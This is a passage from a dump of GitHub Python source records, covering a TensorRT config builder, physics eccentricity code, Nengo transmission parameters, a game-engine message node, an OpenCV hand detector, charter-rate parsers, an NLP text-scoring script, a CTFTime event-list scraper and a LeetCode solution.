RegOp(torch.topk, _topk)\n torch.argmax = RegOp(torch.argmax, _argmax)\n torch.matmul = RegOp(torch.div, _div)\n torch.split = RegOp(torch.split, _split)\n torch.reshape = RegOp(torch.reshape, _reshape)\n\n\ndef reg_torch_nn_op():\n \"\"\"\n Registration list about all torch.nn support op\n \"\"\"\n # Hsigmoid = RegOp(Hsigmoid, _Hsigmoid)\n\n\ndef reg_tensor_op():\n \"\"\"\n Registration list about all tensor support op\n \"\"\"\n for tensor_ in [torch.Tensor]:\n # c = a + b\n tensor_.__add__ = _add\n\n # c = a - b\n tensor_.__sub__ = _sub\n\n # # view (instead bu torch.reshape), permute for [TRT] shuffle layer\n # tensor_.permute = RegTensorOp(tensor_.permute, _permute)\n #\n # # expand_as for [TRT] expand layer\n # tensor_.expand_as = RegTensorOp(tensor_.expand_as, _expand_as)\n\n\ndef reg_plugin_op():\n \"\"\"\n Registration list about all plugin support op\n \"\"\"\n pass\n\n\nclass Build:\n \"\"\"\n build the configuration file.\n \"\"\"\n\n def __init__(self, model=None, input_var=None):\n self.model = model\n self.input = input_var\n create_network()\n reg_functional_op() # torch.nn.functional\n reg_torch_op() # torch\n reg_torch_nn_op() # torch.nn\n reg_tensor_op() # torch.Tensor\n reg_plugin_op() # plugin\n\n def build(self):\n\n print(\"starting ...\")\n INLINE = False\n self.model.eval()\n\n log.init([self.input])\n with torch.no_grad():\n output = self.model(self.input)\n INLINE = True\n\n js_param = get_parameters()\n # mark output layer\n if len(output) >= 2:\n for i, out in enumerate(output):\n for j, layer_param in enumerate(js_param[\"network\"]):\n if layer_param[\"layerName\"] == LayerOut_id[int(id(output))]:\n js_param[\"network\"][j][\"outputName\"] = f\"{cfg.OUTPUTBLOBNAME}_{i + 1}\"\n\n elif len(output) == 1:\n for j, layer_param in enumerate(js_param[\"network\"]):\n if layer_param[\"layerName\"] == LayerOut_id[int(id(output))]:\n js_param[\"network\"][j][\"outputName\"] = cfg.OUTPUTBLOBNAME\n break\n\n # save json file\n with open(os.path.join(cfg.JSON_FILE_DIR, cfg.MODELNAME, cfg.MODELNAME + \".json\"), \"w\") as file:\n json.dump(js_param, file, indent=4, ensure_ascii=False)\n\n print(\"successed! ...\")\n return\n","repo_name":"tianxin1024/generater","sub_path":"src/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":30171,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"21902924290","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import division\n\nimport numpy as np\n\n__all__ = 'IC',\n\n\nclass IC(object):\n \"\"\"\n Initial condition entropy or energy density profile.\n\n :param array-like profile:\n The IC profile as a block-style grid.\n\n :param dxy:\n Size of each grid cell in fm, either a single value ``dxy = dx = dy``\n or a pair ``dxy = (dx, dy)``.\n :type dxy: float or pair of floats\n\n \"\"\"\n def __init__(self, profile, dxy):\n self._profile = np.asarray(profile, dtype=float)\n\n # save (x, y) steps\n try:\n self._dx, self._dy = dxy\n except (TypeError, ValueError):\n self._dx = self._dy = dxy\n\n # save (x, y) max\n ny, nx = self._profile.shape\n xmax = .5*self._dx*(nx - 1.)\n ymax = .5*self._dy*(ny - 1.)\n self._xymax = xmax, ymax\n\n # calculate and save center of mass\n X = np.linspace(-xmax, xmax, nx)\n Y = np.linspace(ymax, -ymax, ny)\n cm = np.array((\n np.inner(X, self._profile.sum(axis=0)),\n np.inner(Y, self._profile.sum(axis=1))\n ))\n cm /= self._profile.sum()\n self._cm = cm\n\n def sum(self):\n \"\"\"\n Total entropy or energy.\n\n \"\"\"\n return self._profile.sum() * self._dx * self._dy\n\n def cm(self):\n \"\"\"\n Center of mass coordinates, assuming the middle of the profile is\n (0, 0).\n\n \"\"\"\n return self._cm\n\n def ecc(self, n):\n r\"\"\"\n Calculate eccentricity harmonic `\\varepsilon_n`.\n\n :param int n: Eccentricity order.\n\n \"\"\"\n ny, nx = self._profile.shape\n xmax, ymax = self._xymax\n xcm, ycm = self._cm\n\n # create (X, Y) grids relative to CM\n Y, X = np.mgrid[ymax:-ymax:1j*ny, -xmax:xmax:1j*nx]\n X -= xcm\n Y -= ycm\n\n # create grid of weights = profile * R^n\n Rsq = X*X + Y*Y\n if n == 1:\n W = np.sqrt(Rsq, out=Rsq)\n elif n == 2:\n W = Rsq\n else:\n if n & 1: # odd n\n W = np.sqrt(Rsq)\n else: # even n\n W = np.copy(Rsq)\n # multiply by R^2 until W = R^n\n for _ in range(int((n-1)/2)):\n W *= Rsq\n W *= self._profile\n\n # create grid of e^{i*n*phi} * W\n i_n_phi = np.zeros_like(X, dtype=complex)\n np.arctan2(Y, X, out=i_n_phi.imag)\n i_n_phi.imag *= n\n exp_phi = np.exp(i_n_phi, out=i_n_phi)\n exp_phi *= W\n\n return abs(exp_phi.sum()) / W.sum()\n","repo_name":"Duke-QCD/hic","sub_path":"hic/initial.py","file_name":"initial.py","file_ext":"py","file_size_in_byte":2585,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"16"}
+{"seq_id":"2471709195","text":"import numpy\nfrom spinn_utilities.overrides import overrides\nfrom nengo_spinnaker_gfe.connection_parameters. \\\n abstract_transmission_parameters import AbstractTransmissionParameters\nfrom nengo_spinnaker_gfe.connection_parameters. \\\n pass_through_node_transmission_parameters import \\\n PassthroughNodeTransmissionParameters\nfrom nengo_spinnaker_gfe.nengo_exceptions import \\\n NotConcatableTransmissionParameter\nfrom nengo_spinnaker_gfe.utility_objects.parameter_transform import \\\n ParameterTransform\nfrom nengo_spinnaker_gfe.connection_parameters.\\\n transmission_parameters_impl import TransmissionParametersImpl\n\ntry:\n from xxhash import xxh64 as fasthash\nexcept ImportError: # pragma: no cover\n from hashlib import md5 as fasthash\n import warnings\n warnings.warn(\"xxhash not installed, falling back to md5. \"\n \"Install xxhash to improve build performance.\", UserWarning)\n\n\nclass EnsembleTransmissionParameters(\n TransmissionParametersImpl, AbstractTransmissionParameters):\n \"\"\"Parameters describing information transmitted by an ensemble.\n\n Attributes\n ----------\n decoders : ndarray\n A matrix describing a decoding of the ensemble (sized N x D).\n learning_rule :\n Learning rule associated with the decoding.\n \"\"\"\n\n __slots__ = [\n #\n \"_decoders\",\n #\n \"_learning_rule\"]\n\n def __init__(self, decoders, transform, learning_rule=None):\n AbstractTransmissionParameters.__init__(self)\n TransmissionParametersImpl.__init__(self, transform)\n\n # Copy the decoders into a C-contiguous, read-only array\n self._decoders = numpy.array(decoders, order='C')\n self._decoders.flags[transform.FLAGS_NAME] = False\n\n # Store the learning rule\n self._learning_rule = learning_rule\n\n def __repr__(self):\n return \"{}:{}:{}\".format(\n self._transform, self._decoders, self._learning_rule)\n\n def __str__(self):\n return self.__repr__()\n\n @property\n def decoders(self):\n return self._decoders\n\n @property\n def learning_rule(self):\n return self._learning_rule\n\n @overrides(TransmissionParametersImpl.__eq__)\n def __eq__(self, other):\n # Two connection_parameters are equal only if they are of the same\n # type, and are equivalent in all other\n # fields.\n return (super(EnsembleTransmissionParameters, self).__eq__(other) and\n numpy.array_equal(self._decoders, other.decoders) and\n self._learning_rule == other.learning_rule)\n\n @overrides(TransmissionParametersImpl.__hash__)\n def __hash__(self):\n return hash((type(self), self._learning_rule, self._transform,\n fasthash(self._decoders).hexdigest()))\n\n @overrides(AbstractTransmissionParameters.concat)\n def concat(self, other):\n \"\"\"Create new connection connection_parameters which are the result of\n concatenating this connection with others.\n\n Parameters\n ----------\n other : PassthroughNodeTransmissionParameters\n Connection connection_parameters to add to the end of this connection.\n\n Returns\n -------\n EnsembleTransmissionParameters or None\n Either a new set of transmission connection_parameters, or None if the\n resulting transform contained no non-zero values.\n \"\"\"\n\n if not isinstance(other, PassthroughNodeTransmissionParameters):\n raise NotConcatableTransmissionParameter()\n\n # Get the outgoing transformation\n new_transform = self._transform.concat(other.transform)\n\n # Create a new connection (unless the resulting transform is empty,\n # in which case don't)\n if new_transform is not None:\n return EnsembleTransmissionParameters(\n self._decoders, new_transform, self._learning_rule\n )\n else:\n # The transform consisted entirely of zeros so return None.\n return None\n\n @property\n @overrides(TransmissionParametersImpl.as_global_inhibition_connection)\n def as_global_inhibition_connection(self):\n \"\"\"Construct a copy of the connection with the optimisation for global\n inhibition applied.\n \"\"\"\n assert self.supports_global_inhibition\n transform = self.full_transform(slice_out=False)[0, :]\n\n return EnsembleTransmissionParameters(\n self._decoders,\n ParameterTransform(\n size_in=self._decoders.shape[0], size_out=1,\n transform=transform, slice_in=self._transform.slice_in)\n )\n\n @property\n def full_decoders(self):\n \"\"\"Get the matrix corresponding to a combination of the decoders and\n the transform applied by the connection.\n \n @:return numpy array\n @:rtype numpy.array\n \"\"\"\n return numpy.dot(self.full_transform(slice_in=False, slice_out=False),\n self._decoders)\n","repo_name":"SpiNNakerManchester/NengoSpiNNaker","sub_path":"nengo_spinnaker_gfe/connection_parameters/ensemble_transmission_parameters.py","file_name":"ensemble_transmission_parameters.py","file_ext":"py","file_size_in_byte":5035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"25821522510","text":"from uplogic.nodes import ULActionNode\nfrom bge.types import KX_GameObject\nfrom bge.logic import sendMessage\nfrom uplogic.nodes import ULOutSocket\n\n\nclass ULSendMessage(ULActionNode):\n def __init__(self):\n ULActionNode.__init__(self)\n self.condition = None\n self.from_obj = None\n self.to_obj = None\n self.subject = None\n self.body = None\n self.done = False\n self.OUT = ULOutSocket(self, self.get_out)\n\n def get_out(self):\n return self.done\n\n def evaluate(self):\n self.done = False\n if not self.get_input(self.condition):\n return\n from_obj: KX_GameObject = self.get_input(self.from_obj)\n to_obj: KX_GameObject = self.get_input(self.to_obj)\n subject = self.get_input(self.subject)\n body = self.get_input(self.body)\n sendMessage(\n subject,\n body,\n to_obj.name if to_obj else '',\n from_obj.name if from_obj else ''\n )\n self.done = True\n","repo_name":"UPBGE/uplogic","sub_path":"uplogic/nodes/actions/sendmessage.py","file_name":"sendmessage.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"16"}
+{"seq_id":"49838238036","text":"import numpy as np\r\nimport cv2\r\nimport os\r\nfrom matplotlib import pyplot as plt\r\n\r\n\r\nif __name__ == \"__main__\":\r\n dirr = './images'\r\n images = []\r\n # loop over the folder and insert each image to the list created above. \r\n for pic in os.listdir(dirr):\r\n img = cv2.imread(os.path.join(dirr,pic))\r\n if img is not None:\r\n images.append(img)\r\n \r\n for i in range(len(images)):\r\n # convert to gray, blur find edges\r\n gray = cv2.cvtColor(images[i],cv2.COLOR_BGR2GRAY)\r\n gray = cv2.medianBlur(gray, 7)\r\n gray=255-gray\r\n gray = cv2.normalize(gray, gray, 0, 255, cv2.NORM_MINMAX) \r\n gray = cv2.Canny(gray,90,110)\r\n kernel = np.ones((5,5),np.uint8)\r\n gray = cv2.dilate(gray,kernel,iterations = 1)\r\n rows = gray.shape[0]\r\n # now find circles or semi circles in the pictures which are the fingers \r\n circles = cv2.HoughCircles(gray, cv2.HOUGH_GRADIENT, 1.1, rows / 8,\r\n param1=30, param2=20,\r\n minRadius=1, maxRadius=30)\r\n if circles is not None:\r\n circles = np.uint16(np.around(circles))\r\n for j in circles[0, :]:\r\n center = (j[0], j[1])\r\n radius = j[2]\r\n cv2.circle(images[i], center, 3, (255, 0, 0), 3)\r\n \r\n\r\n\r\n\r\n plt.imshow(images[i])\r\n plt.title(i+1)\r\n plt.tight_layout()\r\n plt.show()","repo_name":"JameelSi/HandDetector","sub_path":"projectIM2021_1.py","file_name":"projectIM2021_1.py","file_ext":"py","file_size_in_byte":1467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"44240348130","text":"# -*- coding: utf-8 -*-\n\nEAST_ZONES = ['east', 'feast', 'f.east']\n\n\ndef parse_arrival_zones(raw_arrival_zone):\n \"\"\"Split the raw arrival zones into a list of arrival zones, separated by '-'.\n\n Args:\n raw_arrival_zone (str):\n\n Returns:\n list(str)\n\n \"\"\"\n raw_arrival_zones = raw_arrival_zone.split('-')\n raw_arrival_zones_treated = []\n for zone in raw_arrival_zones:\n if any(zone.lower() == east_zone for east_zone in EAST_ZONES):\n raw_arrival_zones_treated.append('Eastern Asia')\n else:\n raw_arrival_zones_treated.append(zone)\n return raw_arrival_zones_treated\n\n\ndef create_voyage_raw_text(departure, arrival):\n \"\"\"From the origin and arrival zones, create the voyage raw text on the following form:\n departure/arrival.\n\n Args:\n departure (str):\n arrival (str):\n\n Returns:\n str\n\n Examples:\n >>> create_voyage_raw_text('foo', 'bar')\n 'foo/bar'\n >>> create_voyage_raw_text('foo', ['france', 'spain'])\n 'foo/france-spain'\n\n \"\"\"\n # in case we receive several arrivals instead of a single string\n if isinstance(arrival, list):\n arrival = '-'.join(arrival)\n\n return '/'.join([departure, arrival])\n\n\ndef parse_rate(rate, quantity=1):\n \"\"\"Try to parse human conventions for charter rates.\n\n Glossary:\n - PD: Per Day\n - WS: World Scale\n\n Examples:\n List of supported fomrmats.\n\n >>> parse_rate('17K PD')\n '17K PD'\n >>> parse_rate('550k')\n 550000.0\n >>> parse_rate('1.85M')\n 1850000.0\n >>> parse_rate('3.3 M')\n 3300000.0\n >>> parse_rate('435000lumpsum')\n 435000.0\n >>> parse_rate('USD 1,86M')\n 1860000.0\n >>> parse_rate('WS40')\n 40.0\n >>> parse_rate('WS 137,5')\n 137.5\n >>> parse_rate('USD 70 PT', 1000)\n 70000.0\n >>> # '-' or '/' seperated values mean it will depend from the\n >>> # destination, hence we cannot decide at this point\n >>> parse_rate('WS58.75/60.75')\n\n >>> parse_rate('USD12,5MT')\n\n >>> parse_rate('RNR')\n\n >>> parse_rate('OWN PROG')\n\n >>> parse_rate('WS25-23(CC/SS)')\n\n >>> parse_rate('US$1.8-2.3M')\n\n Args:\n rate (str):\n quantity (int):\n\n Return:\n float\n\n \"\"\"\n # don't process\n # TODO investigate why we don't need to process this one\n # TODO: ev: we should add tests for this function\n if 'PD' in rate:\n return rate\n\n # we can't do much with that (RNR means Rate Not Reported for rxample, and\n # we don't yet support USD12,5MT)\n if rate in ['RNR', 'COA', 'OWN PROG', 'OWN'] or 'MT' in rate:\n return None\n\n # clean up and normalize\n rate = rate.upper().strip().replace(' ', '')\n\n # Remove currency, since we distinguish rates and dollar prices using the order of magnitude.\n # do it before the rate_coeff choice since 'M' is in 'LUMPSUM'.\n for currency in ['LUMPSUM', 'US$', 'USD']:\n rate = rate.replace(currency, '')\n\n coeff = _choose_rate_coeff(rate, quantity) or 1.0\n # Now that we have the rate coefficient, remove coeff substring.\n for coeff_string in ['PT', 'M', 'K']:\n rate = rate.replace(coeff_string, '')\n\n if rate.startswith('W'):\n rate = _clean_ws_rate(rate)\n\n if '-' in rate or '/' in rate:\n return None\n\n # finally, the actual parsing\n return to_digit(rate) * coeff\n\n\ndef to_digit(value):\n \"\"\"\"Parse a numerical string to return a float.\n\n Args:\n value(str): human style float. See example for supported format\n\n Returns:\n float: parsed float value\n\n Raises:\n ValueError: If the given str wasn't a float\n\n Examples:\n Here is a list of illustrations of the format supported.\n\n >>> to_digit('3.3')\n 3.3\n >>> to_digit('1,2')\n 1.2\n >>> to_digit('3,3 M')\n 3300000.0\n >>> to_digit('4k')\n 4000.0\n >>> to_digit('foo') # doctest: +IGNORE_EXCEPTION_DETAIL\n Traceback (most recent call last):\n ...\n ValueError: could not convert string to float: FOO\n\n \"\"\"\n # remove space and normalize digit symbol\n value = value.upper().replace(' ', '').replace(',', '.')\n\n if 'M' in value:\n return float(value.replace('M', '')) * 1e6\n elif 'K' in value:\n return float(value.replace('K', '')) * 1e3\n else:\n return float(value)\n\n\ndef _clean_ws_rate(rate):\n for dirty in ['WS', 'W', '/RNR', '(CC/SS)']:\n rate = rate.replace(dirty, '')\n\n # TODO probably need to check the use-case and the implementation\n if ',' in rate and '/' in rate:\n # case: WS 32/35.5, 35/38.5 => 32/38.5\n partials = rate.split(',')\n partials = [r.split() for r in partials]\n partials = [item for r in partials for item in r]\n rate = '/'.join([partials[0], partials[-1]])\n\n return rate\n\n\ndef _choose_rate_coeff(rate, quantity=None):\n \"\"\"Convert human-formatted numeric abbreviations.\n\n Args:\n rate (str): human-like numeric\n quantity (int): ?????? (@seb)\n\n Returns:\n float: numeric translation of the given raw input\n\n Example:\n\n >>> _choose_rate_coeff('30K')\n 1000.0\n >>> _choose_rate_coeff('30M')\n 1000000.0\n >>> # special cases\n >>> _choose_rate_coeff('unknown')\n >>> _choose_rate_coeff('whateverPT', quantity=4.0)\n 4.0\n\n \"\"\"\n if 'PT' in rate:\n return quantity\n elif 'M' in rate:\n return 1e6\n elif 'K' in rate:\n return 1e3\n\n # give up if we don't understand the input\n return None\n","repo_name":"theHausdorffMetric/test","sub_path":"kp_scrapers/spiders/charters/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"13036885948","text":"# -*- coding: utf8 -*-\n\nfrom collections import defaultdict\nfrom pycraft.service.const import ContainerWindowID\nfrom pycraft.service.part.item import ItemID\nfrom .base import Container\n\n\nclass InventoryContainer(Container):\n \n SIZE = 36\n\n def __init__(self):\n super().__init__(ContainerWindowID.INVENTORY, self.SIZE)\n # TODO: indexを持たせる\n\n def add_item(self, item):\n \"\"\"Itemをslotsに保存する\n \n クライアントの実装では、indexが小さい方から詰めて保存する\n\n item : Item\n return : Itemを保存したslotsのindex(保存できないときは-1)\n \"\"\"\n empty_slot = None\n for i in range(self.SIZE):\n if self[i].id == item.id:\n count = self[i].count + item.count\n if count <= self[i].MAX_COUNT:\n self[i].count = count\n return i\n else:\n # 詰めた分は通知しなくてもクライアントが勝手に変更する\n diff = self[i].MAX_COUNT - self[i].count\n self[i].count = self[i].MAX_COUNT\n item.count -= diff\n elif self[i].id == ItemID.AIR:\n if empty_slot == None:\n empty_slot = i\n if empty_slot != None:\n self[empty_slot] = item\n return empty_slot\n return -1\n \n def use_item(self, i, target):\n \"\"\"Item を使用する\n \n i : slots の index\n target : Entity or Block (Item を使用する対象)\n return : Item が壊れたら True\n \"\"\"\n target.hit_item(self[i])\n if self[i].is_broken():\n self[i] = self.create_empty()\n return True\n return False\n\n def reduce_items(self, items):\n \"\"\"指定された Item を削除する\n \n return : generator((slot, is_empty))\n \"\"\"\n # 削除する個数を種類毎に数える\n counts = defaultdict(int)\n for item in items:\n if item.id != ItemID.AIR:\n counts[item.id] += item.count\n # 削除する\n updated = {}\n for slot, item in enumerate(self):\n if item.id in counts:\n before = self[slot].count\n self[slot].count -= counts[item.id]\n counts[item.id] = 0\n if self[slot].count < 0:\n counts[item.id] = -self[slot].count\n else:\n del counts[item.id]\n updated[slot] = before - self[slot].count\n # 足りなかった場合はロールバック\n if len(counts) > 0:\n for slot, count in updated:\n self[slot].count += count\n raise ValueError(\n '{name} does not have items.'.format(name=self.name))\n # 更新を確定し、個数 0 は empty に設定する\n for slot in updated.keys():\n if self[slot].count == 0:\n self[slot] = self.create_empty()\n yield slot, True\n else:\n yield slot, False\n\n\nclass ArmorContainer(Container):\n \n SIZE = 4\n\n def __init__(self):\n super().__init__(ContainerWindowID.ARMOR, self.SIZE)\n","repo_name":"nosix/PyCraft","sub_path":"src/pycraft/service/composite/container/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":3305,"program_lang":"python","lang":"ja","doc_type":"code","stars":5,"dataset":"github-code","pt":"16"}
+{"seq_id":"33436659842","text":"## Librerías\n\n# Procesamiento de datos\nimport numpy as np\nimport pandas as pd\n\n# Herramientas de gramática\nimport language_tool_python\nimport contractions\nimport re\n\n# Procesamiento de lenguaje natural\nimport nltk\nfrom textblob import TextBlob, Word\nfrom textblob.sentiments import PatternAnalyzer, NaiveBayesAnalyzer\n\n# Visualizaciones\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n## Cargo el dataset\n\ndf = pd.read_csv(\"text_data.csv\")\n\n## Paso 1: Procesamiento de los datos\n\ndef check_mistakes(text, tool = language_tool_python.LanguageTool('en-GB')): # Busco y corrijo los errores de un solo texto\n\n # Limpieza de formato\n\n pattern = r\"[^\\w\\.',]\"\n\n text = re.sub(pattern, \" \", text)\n\n text = re.sub(f\"[ ]+\", \" \", text)\n\n # Errores ortográficos y tipográficos \n\n spelling_mistakes = len(tool.check(text))\n\n text = tool.correct(text)\n\n # Deshacer contracciones\n \n contract = text.count(\"'\")\n\n correct_text = contractions.fix(text)\n\n return spelling_mistakes, contract, correct_text\n\ndef check_data(df): # Busco y corrijo los errores de todos los textos del DataFrame\n \n # Inicializo las listas\n \n spelling_mistakes_list = list()\n \n contract_list = list()\n \n correct_text_list = list()\n \n # Inica el servidor\n \n tool = language_tool_python.LanguageTool('en-GB') # Servidor local\n\n # Analizo los textos\n\n for i in range(len(df)):\n\n text = df[\"full_text\"][i]\n\n spelling_mistakes, contract, correct_text = check_mistakes(text, tool)\n \n spelling_mistakes_list.append(spelling_mistakes)\n \n contract_list.append(contract)\n \n correct_text_list.append(correct_text)\n \n # Cierra el servidor\n \n tool.close() \n\n # Añado los valores al DataFrame\n \n df[\"correct_text\"] = np.array(correct_text_list)\n\n df[\"spelling_mistakes\"] = np.array(spelling_mistakes_list)\n \n df[\"contractions\"] = np.array(contract_list)\n \n return df\n\n# Ejecuto el procesamiento de los datos del dataframe\n\ncorrect_df = check_data(df)\n\ncorrect_df.to_csv(\"corrected_text.csv\", index = False)\n\n## Paso 2: Procesamiento del lenguaje natural (NLP)\n\ndef get_metrics(text): # Obtengo las métricas de un solo texto\n\n # Numero de palabras por oracion\n\n sentences = len(nltk.sent_tokenize(text))\n\n words = len(nltk.word_tokenize(text))\n\n words_per_sent = words / sentences\n\n # Riqueza del lenguaje\n\n unique_words = len(set(nltk.word_tokenize(text)))\n\n richness = unique_words / words\n\n # Numero de palabras que aportan información\n\n stopwords = nltk.corpus.stopwords.words(\"english\")\n\n useful_words = list()\n\n # Elimino los signos de puntuación para analizar el texto\n\n pattern = r\"[^\\w\\d\\s]\"\n\n clean_text = re.sub(pattern, \" \", text)\n\n clean_text = re.sub(f\"[ ]+\", \" \", clean_text)\n\n for word in nltk.word_tokenize(clean_text):\n\n if word.casefold() not in stopwords :\n\n useful_words.append(word)\n\n informative = len(useful_words) / words\n \n # Análisis sintáxico / morfológico\n\n verb = [\"VB\", \"VBD\", \"VBG\", \"VBN\", \"VBP\", \"VBZ\"]\n\n verb_list = list()\n\n adjective = [\"JJ\", \"JJR\", \"JJS\"]\n\n adjective_list = list()\n\n adverb = [\"RB\", \"RBR\", \"RBS\"]\n\n adverb_list = list()\n\n blob = TextBlob(text)\n\n for word in blob.tags:\n\n if word[1] in verb:\n\n v = Word(word[0]).lemmatize(\"v\")\n\n verb_list.append(v)\n\n elif word[1] in adjective:\n\n adjective_list.append(word[0])\n\n elif word[1] in adverb:\n\n adverb_list.append(word[0])\n\n # Tipos de palabras utilizadas\n\n unique_verbs = len(set(verb_list))\n\n unique_adjectives = len(set(adjective_list))\n\n unique_adverbs = len(set(adverb_list))\n \n # Análisis del sentimiento del texto\n\n blob = TextBlob(text, analyzer = PatternAnalyzer())\n\n polarity = blob.sentiment[0]\n\n subjectivity = blob.sentiment[1]\n \n # Análisis del sentimiento del texto\n\n #blob = TextBlob(text, analyzer = NaiveBayesAnalyzer())\n\n #positive = blob.sentiment[1]\n\n #negative = blob.sentiment[2]\n \n return words_per_sent, richness, informative, unique_verbs, unique_adjectives, unique_adverbs, polarity, subjectivity\n\ndef get_metrics_data(df): # Obtengo las métricas de todos los textos del DataFrame\n \n # Inicializo las listas\n \n words_per_sent_list = list()\n \n richness_list = list()\n \n informative_list = list()\n \n unique_verbs_list = list()\n \n unique_adjectives_list = list()\n \n unique_adverbs_list = list()\n \n polarity_list = list()\n \n subjectivity_list = list()\n \n spelling_mistakes_list = list()\n \n contract_list = list()\n \n correct_text_list = list()\n\n # Analizo los textos\n\n for i in range(len(df)):\n\n text = df[\"correct_text\"][i]\n\n words_per_sent, richness, informative, unique_verbs, unique_adjectives, unique_adverbs, polarity, subjectivity = get_metrics(text)\n \n words_per_sent_list.append(words_per_sent)\n \n richness_list.append(richness)\n \n informative_list.append(informative)\n\n unique_verbs_list.append(unique_verbs)\n\n unique_adjectives_list.append(unique_adjectives)\n\n unique_adverbs_list.append(unique_adverbs)\n\n polarity_list.append(polarity)\n \n subjectivity_list.append(subjectivity)\n\n # Añado los valores al DataFrame\n\n df[\"words_per_sent\"] = np.array(words_per_sent_list)\n \n df[\"richness\"] = np.array(richness_list)\n \n df[\"informative\"] = np.array(informative_list)\n\n df[\"unique_verbs\"] = np.array(unique_verbs_list)\n\n df[\"unique_adjectives\"] = np.array(unique_adjectives_list)\n\n df[\"unique_adverbs\"] = np.array(unique_adverbs_list)\n\n df[\"polarity\"] = np.array(polarity_list)\n \n df[\"subjectivity\"] = np.array(subjectivity_list)\n \n return df\n\n# Ejecuto el procesamiento de los datos del dataframe\n\nscored_df = get_metrics_data(correct_df)\n\nscored_df.to_csv(\"scored_text.csv\", index = False)\n","repo_name":"martabuaf/English-Text-Evaluation","sub_path":"text_processing.py","file_name":"text_processing.py","file_ext":"py","file_size_in_byte":6130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"25964291666","text":"#!/usr/bin/env python\n\nimport requests\nfrom bs4 import BeautifulSoup\nfrom rich.console import Console\nfrom rich.table import Table\nfrom datetime import datetime\nimport argparse\nfrom sys import exit\nfrom rich import print\nfrom ctfl import __version__\n\n\ndef main():\n url = 'https://ctftime.org/event/list/upcoming'\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/5\\\n 37.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3'\n }\n\n parser = parseArgs()\n args = parser.parse_args()\n\n months = {1: \"Jan\", 2: \"Feb\", 3: \"Mar\", 4: \"Apr\", 5: \"May\", 6: \"Jun\", 7: \"Jul\", 8: \"Aug\", 9: \"Sept\", 10: \"Oct\", 11: \"Nov\", 12: \"Dec\"}\n\n if (args.next):\n month = months[int(datetime.now().strftime(\"%m\")) + 1]\n elif (args.all):\n month = None\n elif (args.version):\n print(\"[bold]ctfl {}[/]\".format(__version__))\n exit(0)\n else:\n month = datetime.now().strftime(\"%b\")\n try:\n data = extract_data(url, headers, month)\n print_data(data)\n except KeyboardInterrupt:\n exit(1)\n except Exception:\n print(\"[[bold red]-[/]] Unexpected error occurred, Try again...\")\n\n\ndef parseArgs():\n parser = argparse.ArgumentParser(description=\"CTFTime Upcoming CTF Events Lists\")\n group = parser.add_mutually_exclusive_group(required=False)\n group.add_argument(\n \"-n\",\n \"--next\",\n action=\"store_true\",\n help=\"Get the list of events for the next month\"\n )\n group.add_argument(\n \"-a\",\n \"--all\",\n action=\"store_true\",\n help=\"List all available CTFs on the event list\"\n )\n group.add_argument(\n \"-v\",\n \"--version\",\n action=\"store_true\",\n help=\"Prints the version of the tool\"\n )\n return parser\n\n\ndef extract_data(url, headers, month):\n req = requests.get(url, headers=headers)\n\n soup = BeautifulSoup(req.text, 'html.parser')\n events_table = soup.find_all('table')[0]\n\n names = []\n dates = []\n styles = []\n locations = []\n weights = []\n links = []\n base_link = \"https://ctftime.org\"\n\n if (month is not None):\n for i in events_table.find_all('tr')[1::]:\n columns = i.find_all('td')\n date = columns[1].text.strip()\n if (month in date):\n dates.append(date)\n names.append(columns[0].a.text.strip())\n links.append(base_link + columns[0].a.get('href').strip())\n styles.append(columns[2].text.strip())\n locations.append(columns[3].text.strip())\n weights.append(columns[4].text.strip())\n else:\n pass\n else:\n for i in events_table.find_all('tr')[1:]:\n columns = i.find_all('td')\n names.append(columns[0].a.text.strip())\n links.append(base_link + columns[0].a.get('href').strip())\n dates.append(columns[1].text.strip())\n styles.append(columns[2].text.strip())\n locations.append(columns[3].text.strip())\n weights.append(columns[4].text.strip())\n\n data = [names, dates, styles, locations, weights, links]\n return data\n\n\ndef print_data(data):\n table = Table(title=\"CTFTime CTF Events\")\n\n table.add_column(\"Name\", justify=\"left\", style=\"cyan\", no_wrap=True)\n table.add_column(\"Date\", justify=\"center\", style=\"cyan\")\n table.add_column(\"Style\", justify=\"center\", style=\"cyan\")\n table.add_column(\"Location\", justify=\"center\", style=\"cyan\")\n table.add_column(\"Weight\", justify=\"right\", style=\"cyan\")\n\n for i in range(len(data[0])):\n table.add_row(data[0][i], data[1][i], data[2][i], data[3][i], data[4][i], style=\"link \" + data[5][i])\n\n console = Console()\n console.print(table)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"thehackersbrain/ctfl","sub_path":"ctfl/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":3877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"73247650889","text":"# Problem: https://leetcode.com/problems/missing-number/\n\n# Complexity: O(n) time, O(n) space\n\nfrom typing import Dict, List\n\n\nclass Solution:\n def missingNumber(self, nums: List[int]) -> int:\n keys: Dict[int, int] = {}\n\n for n in nums:\n keys[n] = 1\n\n for i in range(len(nums)+1):\n if i not in keys:\n return i\n\n # Should not get here\n return -1\n","repo_name":"emmaneugene/algos","sub_path":"leetcode/blind75/missingNumber.py","file_name":"missingNumber.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
